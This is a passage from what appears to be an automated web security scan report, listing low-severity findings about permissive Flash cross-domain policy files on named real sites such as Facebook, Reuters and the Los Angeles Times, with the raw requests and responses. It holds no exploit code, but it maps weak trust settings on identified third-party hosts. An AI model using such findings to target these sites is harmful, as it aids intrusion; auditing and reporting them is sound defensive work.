Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: rtq.careerbuilder.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Thu, 19 May 2011 19:43:17 GMT
Accept-Ranges: bytes
ETag: "d89fcdff5c16cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: REBEL43
Date: Sun, 04 Sep 2011 00:57:57 GMT
Connection: close
Content-Length: 842

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.careerbuilder.com" />
<allow-access-from domain="img.icbdr.com" />
<allow-access-from domain="img.cbdr.com" />
<allow-access-from domain="*.icbdr.com" />
<allow-access-from domain="*.cbdr.com" />
<allow-access-from domain="*.jobbguiden.se" />
<allow-access-from domain="*.jobbingmall.nl" />
<allow-access-from domain="*.careerbuilder.de" />
<allow-access-from domain="*.careerbuilder.no" />
<allow-access-from domain="*.careerbuilder.ch" />
<allow-access-from domain="*.kariera.gr" />
<allow-access-from domain="*.careerbuilder.gr" />
<allow-access-from domain="*.careerbuilder.fr" />
...[SNIP]...

6.101. http://search.charlotteobserver.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://search.charlotteobserver.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.charlotteobserver.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:23:44 GMT
Server: Apache/1.3.41
Vary: Accept-Encoding
Last-Modified: Thu, 17 Dec 2009 22:05:10 GMT
ETag: "ea0d60-df-4b2aab16"
Accept-Ranges: bytes
Content-Length: 223
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.charlotteobserver.com" />

...[SNIP]...

6.102. http://search2.sacbee.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://search2.sacbee.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: search2.sacbee.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:23:50 GMT
Server: Apache/1.3.41
Vary: Accept-Encoding
Last-Modified: Mon, 15 Aug 2011 23:32:59 GMT
ETag: "a12c7f-175-4e49acab"
Accept-Ranges: bytes
Content-Length: 373
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
   "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.sacbee.com"/>
   <allow-access-from domain="*.mcclatchyinteractive.com"/>
   <allow-access-from domain="*.vmixcore.com"/>
...[SNIP]...

6.103. http://snas.nbcuni.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: snas.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:58 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
Last-Modified: Fri, 17 Dec 2010 18:25:22 GMT
ETag: "2c9cd-58b-4979f4b136880"
Accept-Ranges: bytes
Content-Length: 1419
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:50:08 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ivillage.com" />
<allow-access-from domain="*.nbbcdev.com" />
<allow-access-from domain="*.bravotv.com" />
<allow-access-from domain="*.console.net" />
<allow-access-from domain="*.digphilly.com"/>
<allow-access-from domain="*.nbc10rss.com"/>
<allow-access-from domain="*.nbc10.com"/>
<allow-access-from domain="*.scifi.com"/>
<allow-access-from domain="*.weatherplus.com" />
<allow-access-from domain="*.nbcuxd.com" />
<allow-access-from domain="vplayer-preview-dev.nbcuni.ge.com" />
<allow-access-from domain="*.industrynext.com"/>
<allow-access-from domain="*.nbcuni.com"/>
<allow-access-from domain="widgets.nbcuni.com"/>
<allow-access-from domain="*.nbc.com"/>
<allow-access-from domain="*.thetonightshowwithconan.com"/>
<allow-access-from domain="*.tonightshowwithconanobrien.com"/>
<allow-access-from domain="*.thetonightshowwithconanobrien.com"/>
<allow-access-from domain="*.tonightshow.com" />
<allow-access-from domain="*.tonightshowwithconan.com" />
<allow-access-from domain="*.latenightwithjimmyfallon.com" />
<allow-access-from domain="*.ingaylewetrust.com" />
<allow-access-from domain="*.thejaylenoshow.com" />
<allow-access-from domain="127.0.0.1"/>
<allow-access-from domain="localhost"/>
<allow-access-from domain="*.sudjam.com"/>
...[SNIP]...

6.104. http://static.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

The policy also sets site-control permitted-cross-domain-policies="master-only", so Flash Player honours only this master file and ignores any other policy file that may be published elsewhere on the host.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.146.199
X-Cnection: close
Date: Sun, 04 Sep 2011 01:12:40 GMT
Content-Length: 1527
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

6.105. http://syndication.mmismm.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:12:23 GMT
Server: Apache
Last-Modified: Mon, 25 Jul 2011 02:22:10 GMT
ETag: "10e-4a8db7b7df880"
Accept-Ranges: bytes
Content-Length: 270
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.adap.tv"/>
...[SNIP]...

6.106. http://www.careerbuilder.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.careerbuilder.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Thu, 19 May 2011 19:43:17 GMT
Accept-Ranges: bytes
ETag: "d89fcdff5c16cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: BEAR9
Date: Sun, 04 Sep 2011 01:25:12 GMT
Connection: close
Content-Length: 842

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.careerbuilder.com" />
<allow-access-from domain="img.icbdr.com" />
<allow-access-from domain="img.cbdr.com" />
<allow-access-from domain="*.icbdr.com" />
<allow-access-from domain="*.cbdr.com" />
<allow-access-from domain="*.jobbguiden.se" />
<allow-access-from domain="*.jobbingmall.nl" />
<allow-access-from domain="*.careerbuilder.de" />
<allow-access-from domain="*.careerbuilder.no" />
<allow-access-from domain="*.careerbuilder.ch" />
<allow-access-from domain="*.kariera.gr" />
<allow-access-from domain="*.careerbuilder.gr" />
<allow-access-from domain="*.careerbuilder.fr" />
...[SNIP]...

6.107. http://www.cars.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cars.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cars.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:25:11 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 14 May 2009 14:15:36 GMT
ETag: "9c4f-27a-f632f200"
Accept-Ranges: bytes
Content-Length: 634
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/xml
Set-Cookie: cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:27 GMT; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.cars.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.2o7.net" />
...[SNIP]...

6.108. http://www.charlotteobserver.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.charlotteobserver.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.charlotteobserver.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.41
Last-Modified: Thu, 17 Dec 2009 22:05:10 GMT
ETag: "ea0d60-df-4b2aab16"
Content-Type: application/xml
Cache-Control: max-age=531
Date: Sun, 04 Sep 2011 01:00:13 GMT
Content-Length: 223
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.charlotteobserver.com" />

...[SNIP]...

6.109. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

The policy also sets site-control permitted-cross-domain-policies="master-only", so Flash Player honours only this master file and ignores any other policy file that may be published elsewhere on the host.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.64.198.64
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

6.110. http://www.fansonly.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fansonly.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Several third-party entries in this policy (the doubleclick.net, 2mdn.net, flv.sales.cbs.com and mediapm.edgesuite.net rules) carry secure="false". The secure attribute only takes effect when the policy file is served over HTTPS, but there it admits SWF files loaded over plain HTTP, so HTTPS resources on this host become readable from the HTTP versions of those domains.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fansonly.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:17 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Last-Modified: Tue, 30 Aug 2011 23:41:52 GMT
Accept-Ranges: bytes
Content-Length: 909
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.fansonly.com" />
<allow-access-from domain="*.initinteractive.com" />
<allow-access-from domain="174.132.109.106" />
<allow-access-from domain="*.cstv.com" />
<allow-access-from domain="*.ocsn.com" />
<allow-access-from domain="*.collegesports.com" />
<allow-access-from domain="livestats.*.fansonly.com" />
<allow-access-from domain="livestats.*.cstv.com" />
<allow-access-from domain="livestats.*.collegesports.com" />
<allow-access-from domain="*.rolltide.com" />
<allow-access-from domain="*.ucirvinesports.com" />
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="flv.sales.cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mediapm.edgesuite.net" secure="false" />
...[SNIP]...

6.111. http://www.foxsportssouthwest.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportssouthwest.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.foxsportssouthwest.com

Response

HTTP/1.0 200 OK
Server: nginx/1.0.3
Content-Type: application/xml
Last-Modified: Mon, 08 Nov 2010 18:43:43 GMT
ETag: "1f2f8aa-d9-4948f00e3b5c0"
Accept-Ranges: bytes
Content-Length: 217
Date: Sun, 04 Sep 2011 01:26:09 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.edgecastcdn.net" />
<allow-access-from domain="*.brandaffinity.net" />
<allow-access-from domain="*.netbat.com" />
</cro
...[SNIP]...

6.112. http://www.latimes.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.latimes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

The *.brightcove.com entry carries secure="false". That attribute only takes effect when the policy file is served over HTTPS, but there it admits SWF files loaded over plain HTTP from any brightcove.com subdomain.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.latimes.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 438
Content-Type: text/xml
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Last-Modified: Thu, 03 Mar 2011 02:18:58 GMT
ETag: "1b6-4d6efa92"
Accept-Ranges: bytes
Date: Sun, 04 Sep 2011 01:26:15 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.wp.com"/>
<allow-access-from domain="s-ssl.wordpress.com"/>
<allow-access-from domain="latimesphoto.wordpress.com"/>
<allow-access-from domain="framework.latimes.com"/>
<allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...

6.113. http://www.myspace.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.myspace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myspace.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/xml
Expires: -1
Last-Modified: Thu, 01 Sep 2011 03:28:02 GMT
Accept-Ranges: bytes
ETag: "0d70275768cc1:0"
Server: Microsoft-IIS/7.5
X-Server: 979f881f10211383746f03754b03c7d9bbf75b93f28b477f
X-PoweredBy: Chunk from Goonies
Date: Sun, 04 Sep 2011 01:26:20 GMT
Connection: keep-alive
Content-Length: 680
X-Vertical: profileidentities

<cross-domain-policy>
   <allow-access-from domain="*.fimservecdn.com" />
   <allow-access-from domain="lads.myspace.cn" />
   <allow-access-from domain="*.ilike.com" />
   <allow-http-request-headers-fro
...[SNIP]...
<allow-access-from domain="*.myspacecdn.com" />
   <allow-access-from domain="*.myspace.com" />
...[SNIP]...

6.114. http://www.reuters.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Every entry shown in this policy carries secure="false". The secure attribute only takes effect when the policy file is served over HTTPS, but there it admits SWF files loaded over plain HTTP, so HTTPS resources on this host become readable from the HTTP versions of all the listed domains, including the ad-serving ones.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.reuters.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:42 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 00:49:42 GMT
browser-expires: Sun, 4 Sep 2011 00:44:42 GMT
Content-Type: text/xml;charset=UTF-8
Content-Length: 857
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.reuters.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.reutersmedia.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.uk.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="feedroom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="creatives.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.oho.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.metacarta.com" secure="false"/>
...[SNIP]...

6.115. http://www.sacbee.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sacbee.com

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 15 Aug 2011 23:32:59 GMT
ETag: "a12c7f-175-4e49acab"
Server: Apache/1.3.41
Content-Type: application/xml
Cache-Control: max-age=175
Date: Sun, 04 Sep 2011 00:57:44 GMT
Content-Length: 373
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
   "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.sacbee.com"/>
   <allow-access-from domain="*.mcclatchyinteractive.com"/>
   <allow-access-from domain="*.vmixcore.com"/>
...[SNIP]...

6.116. http://www.sologig.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sologig.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sologig.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Thu, 19 May 2011 19:43:17 GMT
Accept-Ranges: bytes
ETag: "d89fcdff5c16cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: REBEL39
Date: Sun, 04 Sep 2011 01:27:38 GMT
Connection: close
Content-Length: 842

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.careerbuilder.com" />
<allow-access-from domain="img.icbdr.com" />
<allow-access-from domain="img.cbdr.com" />
<allow-access-from domain="*.icbdr.com" />
<allow-access-from domain="*.cbdr.com" />
<allow-access-from domain="*.jobbguiden.se" />
<allow-access-from domain="*.jobbingmall.nl" />
<allow-access-from domain="*.careerbuilder.de" />
<allow-access-from domain="*.careerbuilder.no" />
<allow-access-from domain="*.careerbuilder.ch" />
<allow-access-from domain="*.kariera.gr" />
<allow-access-from domain="*.careerbuilder.gr" />
<allow-access-from domain="*.careerbuilder.fr" />
...[SNIP]...

6.117. http://www.stumbleupon.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 18 Oct 2010 23:10:01 GMT
Content-Type: application/xml
Content-Length: 460
Date: Sun, 04 Sep 2011 01:27:58 GMT
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
   <allow-access-from domain="cdn.stumble-upon.com" />
...[SNIP]...

6.118. http://www.tsn.ca/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tsn.ca
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

